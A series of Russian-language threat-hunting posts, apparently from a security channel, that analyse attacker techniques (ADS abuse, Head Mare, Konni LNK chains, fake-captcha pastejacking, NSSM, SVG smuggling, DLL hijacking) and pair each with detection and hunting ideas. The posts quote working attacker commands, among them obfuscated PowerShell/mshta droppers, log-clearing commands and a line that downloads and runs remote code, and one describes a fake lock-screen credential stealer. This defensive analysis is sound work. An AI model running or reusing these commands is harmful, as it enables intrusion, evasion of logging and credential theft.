Всем привет! ✌️

Что делать, если пользователь удалил фишинговый файл 📬?) или атакующие стерли следы компрометации? 😐

Давайте обратимся к MSDN и вспоним, что такое файл в NTFS.

Файл — это единица данных в файловой системе, к которым пользователь может получить доступ и управлять ими. Файл должен иметь уникальное имя в своем каталоге. Он состоит из одного или нескольких потоков байтов, которые содержат набор связанных данных, а также набор атрибутов (также называемых свойствами), описывающих файл или данные в файле.

На картинке представлен файл с одним основным потоком и двумя альтернативными.

На основе этого мехнизма работает служба Attachment Execution Service.

Когда файл сохраняется ему добавляются альтернативные потоки:
🔤 ZoneID - число, указывающее Security Zone, из которой был получен файл. Вот возможные значения:
0 – My Computer (local files)
1 – Intranet (internal network)
2 – Trusted sites
3 – Internet (most web downloads)
4 – Untrusted (flagged as risky by Microsoft SmartScreen)
🔤 ReferrerURL - веб-сайт, с которого был загружен файл
🔤 HostURL - прямая ссылка для скачивания

Информацию о создании ADS можно увидеть в событии Sysmon - 15, если забыли настроить в MFT.

Таким образом мы можем сформулировать хант:

Атакующие нас пробили через фишинг. Пользователь удалил файл после открытия или хакеры удалили за собой файл. Найдем упоминания ReferrerURL/HostURL

Нам нужно:
🔤найти все созданные упоминания об ADS в событиях или в MFT
🔤определить расширения файлов, которые нас интересуют (можем воспользоваться https://filesec.io/)
🔤 провести анализ
🔤 или сгруппировать найденные url и проверить их репутацию

#detection@detectioneasy

Продолжим тему с ADS 💻

ADS для хакеров отличное место, для хранения нагрузки, создание потока несильно шумное событие. А запуск нагрузки из ADS может и не привлечь внимания 🤔

Для создания потока мы можем выполнить команду:

type C:\windows\system32\calc.exe > c:\users\qwer\downloads\cv.doc:calc.exe

Чтобы запустить процесс воспользуемся командой:

wmic process call create c:\users\qwer\downloads\cv.doc:notepad.exe

Как знаем из предыдущего поста создание ADS регистрируется событием Sysmon EventId = 15

Нас может заинтересовать:
🔤 создание потока подозрительным процессом, например не браузером

🔤 использовать хеши в качестве индикаторов. В поле Hash хранится хеш-значение данных в потоке

🔤 поле Contents может быть пустым. в примере на скриншоте в поток был записан бинарный файл. Понять было ли что-то записано в поток, нам поможет наличие значения в поле Hash

Второе событие которое нам поможет это создание процесса:

🔤 в поле CommandLine ищем использование символа ":" , могут быть специфичные процессы, где будет использоваться этот символ, но можем их отфильтровать

#detectioneasy@detection

Всем привет! ✌️
The DFIR Report порадовали нас новым отчетом Fake Zoom Ends in BlackSuit Ransomware

🔭 Для хантинга похожей активности можем:

🔤 отслеживать события создания файла клиента Zoom, Talk etc и проверять значения полей HostURL или ReferrerURL из события создания ADS

🔤 отслеживать создание процесса клиента, с пустой метаинформацией (не заполнен автор продукта, отсутствует цифровая подпись)

🔤 отслеживать создание/запуск несанкционированных bat/cmd скриптов

🔤 отслеживать добавление исключений в Defender, используя коммандлет Add-MpPreference

🔤 отслеживать запуск команд timeout, ping, tar, net group, whoami, systeminfo, nltest /dclist

🔤 для горизонтального передвижения использовали PSExec и RDP. Можем отслеживать создание подозрительных сессий.

Для ханта RDP можем собрать события 4624 с logontype 3 и 10, событие 1149 (Terminal-Services-RemoteConnectionManager/Operational). Выделить с каких адресов/аккаунтов выполняли/пытались подключиться по RDP

#detection@detectioneasy

Сегодня, поговорим о группировке Head Mare 💻

🔤 хакеры присылают фишинговое письмо с запароленным архивом. вышеописанный архив - это полиглот - EXE/ZIP. В архиве находится LNK-файл с расширением - PDF

🔤 При запуске LNK-файла выполнится следующая команда, которая найдет путь к архиву, выполнит его как исполняемый файл. Далее отрежет часть архива и запустит pdf-decoy-файл

powershell.exe -WindowStyle hidden -c "$r=$(Get-Location).Path + '\Заявка_[REDACTED]_5_03Д.zip';
 
if(Test-Path $r) {
 cmd.exe /c start /B $r;
} else {
 $f=$(Get-ChildItem -Path '%userprofile%' -Recurse -Filter 'Заявка_[REDACTED]_5_03Д.zip' | Select-Object -First 1);
 if($f) {
      $r=$f.FullName; cmd.exe /c start /B $f.FullName;
 };
};
if(-Not (Test-Path $r)) {
 $r=$(Get-ChildItem -Path '%temp%' -Recurse -Filter
      "Заявка_[REDACTED]_5_03Д.zip" | Select-Object -First 1).FullName;
};
[System.IO.File]::WriteAllBytes(
 [System.IO.Path]::Combine('%temp%','Заявка_[REDACTED]_5_03Д.pdf'),
 ([System.IO.File]::ReadAllBytes($r) | Select-Object -Skip 7166046 -First 147100)
);
Start-Process -FilePath $([System.IO.Path]::Combine('%temp%', 'Заявка_[REDACTED]_5_03Д.pdf'));

🔤 архив содержит Python-бекдор собранный PyInstaller'ом. Скрипт отправляет на C2 информацию о себе, и получает статус об успешной регистрации бота

🔤 далее выполнялись команды для сбора информации о системе, и в некоторых случаях устанавливался Meshagent

Что можно похантить?) 🔭
🔤 если у Вас не заблокирована пересылка архивов с паролем, и письма где-то хранятся. Ищем письма в которых содержится слово пароль и (ссылка или вложение). Хакеры часто используют пароль для архивов или облака, чтобы обойти песочницу и почтовые шлюзы

🔤 Проверяем в событиях Powershell наличие командлетов ReadAllBytes, System.IO.Path, Combine

🔤 запуск архива, странным способом в данном случае start

🔤 проверяем создание дирректорий Python

🔤 проверяем отсутствие процессов с именем MeshAgent.exe и служб с именем или описанием Mesh Agent

#ttp@detectioneasy
#detection@detectioneasy

Всем привет! ✌️
ЛК поделись инструментарием Head Mare

mimikatz - дамп кред
ADRecon - сбор информации о домене
secretsdump - дамп кред
ProcDump - дамп процессов
Localtonet - построение тоннелей
revsocks - построение тоннелей
ngrok - построение тоннелей
cloudflared - построение тоннелей
Gost - построение тоннелей
fscan - сканер
SoftPerfect Network Scanner - сканер
mRemoteNG - менеджер удаленных подключений
PSExec - PSExec 😇
smbexec - скрипт из Impacket
wmiexec - скрипт из Impacket
LockBit 3.0 - ransomware
Babuk - ransomware

Из инструментария можем увидеть, что хакеры совсем не брезгуют использовать opensource. Скрипты из набора Impacket - уже стали musthave, от которого сложно избавиться.

🔤 Фишинг и компрометация сетей подрядчиков. Эксплуатация уязвимостей CVE-2023-38831 в WinRAR, CVE-2021-26855 - Microsoft Exchange.

🔤 Для закрепления в инфраструктуре хакеры создавали локальных пользователей, строили тоннели, и закрепляли их при помощи Non-Sucking Service Manager (NSSM), который позволяет запускать любое приложение как сервис Windows.

🔤 Для обхода обнаружения злоумышленники использовали имена системных файлов для своих нагрузок, wusa.exe, calc.exe, winuac.exe, winsw.exe. Переименовывание системных утилит, например cmd.exe в log.exe

🔤Остановка служб журналирования и очистка логов

stop-service -name <servicename>
remove-service -name <servicename>
remove-service -name "<servicename>"
sc stop <servicename>
sc delete <servicename>
Get-EventLog -LogName * | ForEach { Clear-EventLog $_.Log }

🔤 Загрузка новых PE-файлов с C2. Можем отслеживать событие Sysmon - Event ID 29: FileExecutableDetected

🔤 Использование утилит для построения тоннелей

🔤 Для перемещения в инфраструктуре использовались mRemoteNG, smbexec, wmiexec, PAExec и PsExec

#detection@detectioneasy
#ttp@detectioneasy

Всем привет!) ✌️💻
Оформил результаты публикаций за Q1 в небольшой журнал)
надеюсь понравится

Всем привет! ✌️

Давайте сегодня посмотрим отчет, связанный с TTP Konni APT

🔤 Первый LNK запускает mshta.exe со следующими аргументами:

javascript:a="pow"+"ershell -ep bypa"+"ss ";g="c:\\pro"+"gramdata\\";m=" -Encoding Byte;sc ";p="$w ([byte[]]($f "+"| select -Skip 0x08e4)) -Force";s="a=new Ac"+"tiveXObject('WSc"+"ript.Shell');a.Run(c,0,true);close();";c=a+"-c $t=0x17cb;$k = Get-ChildItem *.lnk | where-object {$_.length -eq $t} | Select-Object -ExpandProperty Name;if($k.co"+"unt -eq 0){$k=G"+"et-ChildItem $env:TEMP\\*\\*.l"+"nk | where-object{$_.length -eq $t};};$w='"+g+"e.ps1';$f=gc $k"+m+p+m+g+"3246 0;"+a+"-f $w;";eval(s);

🔤 Скрипт выполняет поиск LNK-файла, сначала в текущей директории, потом в TEMP. LNK-файла должен быть определенного размера

🔤 Из найденного LNK извлекается PowerShell- скрипт и сохраняется в ProgramData\e.ps1

Хакеры часто используют самоизвлекающиеся LNK-файлы, чтобы доставить второй этап атаки

🔤 e.ps1 обфусцированный скрипт, который обращается на C2 и загружает с dropbox архив

🔤Для закрепления хакеры использовали планировщик задач и ключ реестра Run

🔤 Также скрипт получает c С2 текст, кодированный Base64 и выполняет его


🔭 Для обнаружения:

🔤 отслеживаем создание LNK и PS1 файлов в директориях пользователя

🔤 в аргументах Powershell ищем -Encoding Byte, DecodeByte. Можем поискать в логах Powershell или аргументах наличие Base64-строк

🔤 отслеживаем создание новых задач в журнале Security EventId = 4698. В данном событии содержится xml созданной задачи.

Для хантинга:

🔤 можем собрать и спарсить все задачи пользователей, и проанализировать Автора, Исполняемый файл, Аргументы

🔤 наличие в ключах реестра Run скриптов

#ttp@detectioneasy
#detection@detectioneasy

Всем привет! 💻✌️

Продолжим обзор Konni APT

В постах раннее мы увидели, что Konni используют фишинг для получения доступа и длинные multistage цепочки из lnk bat powershell autoit и других исполняемых файлов

В отчете от Cyfirma аналитики объясняют страсть к lnk следующими возможностями Windows 📄:

скрытие расширения файла в проводнике Windows и ограничение отображения аргументов в 260 символов в файлах LNK

Уже не секрет, что если вставить много пробелов в названии файлов, то расширение не будет видно в проводнике, а для LNK расширение не отображается, даже если включить в настройках проводника опцию - Отображать известные расширения файлов. Включить отображение LNK можно поправив ключ в реестре.

⚠️ Еще одна особенность проводника в отображении свойств LNK-файлов - отображается только 260 символов из поля Аргументы.

Давайте перейдем к самой атаке:

🔤 Атака началась с фишинга, ZIP с DOCX.LNK и 2 PDF-файла. Хакеры воспользовались пробелами в аргументах LNK, чтобы остаться незамеченными

🔤 Команда в LNK - это обфусцированный cmd+powershell скрипт

🔤 Вначале CMD-скрипт ищет интерпретатор Powershell и запускает его

🔤 Хакеры в очередной раз используют self-extracted lnk, в этом случае для открытия docx - decoy-файла (странное поведение, у них в архиве было еще 2 pdf....)

🔤Далее по другому смещению из LNK извлекается CAB-файл и vbs-скрипт в директорию C:\Users\Public\Documents

🔤VBS-скрипт извлекает файлы из CAB

🔤 Из CAB извлекается семь bat-файлов, которые продолжают вредоносную цепочку

🔤 И классика, в качестве закрепа в ключ реестра Run добавляется vbs

🔭 Для обнаружения, в дополнение к посту ранее:

🔤 запуск офисных документов не проводником, и не браузером и не почтовым клиентом или запуск офисных документов скриптами

🔤 создание bat-файлов

🔤 добавление скриптов в ключи реестра для автозапуска

🔤 создание CAB-файлов в директориях пользователя

🔤 создание файлов в C:\Users\Public. Наверное может получится неплохой хант, если начать анализировать файлы в сабдиректориях)

PT ESC недавно писали как хакеры ломают парсеры LNK-файлов, чтобы остаться незамеченными

#detection@detectioneasy
#ttp@detectioneasy

Всем привет! 💻✌️

Сегодня рассмотрим технику fake captcha

Да, вам не показалось, суть техники: вам присылают письмо со ссылкой или файл, в котором ссылка. После перехода по ней, появляется окошко - нужно подтвердить, что ты не робот 🤖

Капча необычная, есть нюанс - используется техника "clipboard hijacking" или "pastejacking" - в буфер обмена добавляется вредоносный скрипт, далее нужно нажать сочетание клавиш Win+R, далее в появившемся окне нажать Ctrl+V , и подтвердить, что вы молодец - Verify 🦣

В буфер обмена вставлялся вот такой скрипт:

powershell -w h -c "iex $(irm 138.199.156[.]22:8080/$($z = [datetime]::UtcNow; $y = ([datetime]('01/01/' + '1970')); $x = ($z - $y).TotalSeconds; $w = [math]::Floor($x); $v = $w - ($w % 16); [int64]$v))"

Для формирования url, считается количество секунд между двумя датами.

🔭 Что делать:

🔤 запретить пользователям Win + R ❌

🔤 отслеживать создание новых ключей в ветке реестра HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\RunMRU\

Для ханта, необходимо собрать значения ключей HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\RunMRU\ всех пользователей, и провести анализ. Можно предусмотреть исключения, что-то могли использовать админы

#detection@detectioneasy
#ttp@detectioneasy

Всем привет 💻✌️

Наткнулся на прикольную технику для кражи учетных данных)

Утилита называется Win10CredsThief

Сценарий использования на red team может быть такой: пробили тачку и не получается продвинуться, повыситься, получить хеш и т.п. И тут в дело вступает социалка, Win10CredsThief - это html страница, которая мимикрирует под экран блокировки Windows10. Написано довольно хорошо и пользователь вряд ли что-то заподозрит

Для убедительности лучше проверять какое изображение для блокировки используется в организации, чтобы не вызвать лишних подозрений

🔭 Что делать:
🔤 отслеживать запуск браузера в режиме киоска --kiosk

#detection@detectioneasy
#ttp@detectioneasy

Всем привет 💻✌️

Бывает, что нужно создать службу, но соответствующего файла нет? Злоумышленники используют NSSM (Non-Sucking Service Manager) для закрепления в системе

NSSM - это инструмент, который позволяет запускать любой исполняемый файл как службу.

⚠️ Пример использования:
У хакеров есть вредоносный файл, который не может запускаться как служба, nssm выступает в роли обертки для него

🔭 Что делать:
🔤 отслеживаем создание процесса с параметрами

Description = "The non-sucking service manager" or 
Product = "NSSM 64-bit"

Можем похантить:

🔤 наличие куста реестра HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\NSSM, если существует в нем можем посмотреть EventMessageFile - путь к nssm.exe

🔤 наличие логов в журнале Application от провайдера nssm

#detection@detectioneasy
#ttp@detectioneasy

Всем привет 💻✌️

Продолжим тему с созданием служб сторонними утилитами и рассмотрим сегодня srvany-ng

Создается служба из консоли cmd или powershell:

sc create "MyServiceName" start= auto binPath= "C:\Path\To\srvany-ng.exe"

это уже подозрительное поведение, на которое можно обратить внимание, или подготовить автореспонс на проверку репутации файла (отправку в пески)

Для мониторинга можем использовать следующую информацию о файле:

Description = Run any Windows application as a Service.
Product = srvany-ng
Company = Anthony Birkett
OriginalFileName = srvany-ng.exe

🔤 Правило корреляции можно сделать на отслеживание цепочки запуска процессов svchost.exe -> *.exe -> *.exe
Скорее всего нужно будет профилировать

🔤 Для хантинга можем поискать следующую информацию в реестре:

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\*\Parameters\ ключ Application - путь к файлу который запустит служба

Дополнительно в Application могут быть ключи:

AppDirectory 
AppParameters
AppEnvironment
RestartOnExit

⚠️ Можно проверить, что файл службы имеет расширение exe и файл в Application - тоже имеет расширение exe

#detection@detectioneasy
#ttp@detectioneasy

Всем привет 💻✌️

Получают ли Ваши сотрудники файлы SVG?

ЛК представили небольшой обзор злоупотребления SVG.

SVG (Scalable Vector Graphics) формат описания графики в xml, который позволяет встраивать скрипты JS и теги HTML

SVG используются для доставки следующего этапа при использовании техники SVG-Smuggling (poc) или для перенаправления жертвы на следующий ресурс (пример)

🔭 Обнаружение:

🔤 Создание svg-файлов в директориях пользователя

ProviderName="Microsoft-Windows-Sysmon" and  EventId = 11 and TargetFilename = "?:\Users\.*\.svg"

🔤 Детект на основе ADS NTFS

ProviderName="Microsoft-Windows-Sysmon" and  EventId = 15 and TargetFilename endswith ".svg:Zone.Identifier" and Contents=".*ZoneId=3.*"

🔤 Мониторить создание процессов у которых в аргументах содержится ".*svg\s.*"

#detection@detectioneasy
#ttp@detectioneasy

Всем привет 💻✌️

Раннее мы рассмотрели использование WebDAV для доставки вредоносов или запуска нагрузки с удаленного сервера. WebDAV не единственный протокол, которым злоупотребляют злоумышленники, давайте рассмотрим - SMB

Для монтирования сетевой папки, часто используют команду net use или в попытке получить хеш пользователя атакуют с помощью ntlm leak

🔭 Обнаружение:

🔤 Мониторим запуск net.exe или net1.exe с аргументами use

🔤 Отслеживаем создание процессов, которые начинаются с \\ или буквы тома, которая не используется, например процессы запускались с томов F: и D:, а потом notmalware.exe с тома Q:

🔤 отслеживаем исходящие сетевые соединения на 445 порт за пределами корпоративной сети

🔤 В журнале Microsoft-Windows-SMBClient/Connectivity можем найти, к каким SMB-серверам были подключения, используем для отслеживания новых и ретро по старым событиям

🎯 Для хантинга можем проверить:

🔤 ветку реестра HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\ на наличие параметров, начинающихся с ## (экранирование \\) или https, http

#detection@detectioneasy
#ttp@detectioneasy

Всем привет 💻✌️

Много обсуждений вызвали репорты Solar 4rays и ЛК об уязвимостях в VipNet, которые связанны с загрузкой вредоносных dll или подменой системных утилит. Аналогичные проблемы присутствуют во многих продуктах.

Для выполнения вредоносного кода из dll, может использоваться несколько техник, которые MITRE объединили в DLL. Она включает:

🔤 DLL Sideloading
🔤 DLL Search Order Hijacking
🔤 DLL Redirection
🔤 Phantom DLL Hijacking
🔤 DLL Substitution

🔭 Обнаружение:

🔤 отслеживаем создание новых dll файлов в директориях, где хранится исполняемый файл, и их загрузку в память процесса

🔤 запуск процесса и загрузка dll (без подписи или с невалидной подписью) из одной директории в профиле пользователя (\w:\\\\users\\.*\\.*\.dll$). Можно объединить с предыдущим

🔤 запуск процессов с именами системных утилит, с нестандартной цифровой подписью (отсутствием ее) или из нестандартных путей c:\windows\system32 c:\windows\syswow64 c:\windows\winsxs

🔤 загрузка dll или запуск дочернего процесса, которые ранее не использовались (нужно использовать ретро)

Скорее всего будет очень шумно...

#detection@detectioneasy
#ttp@detectioneasy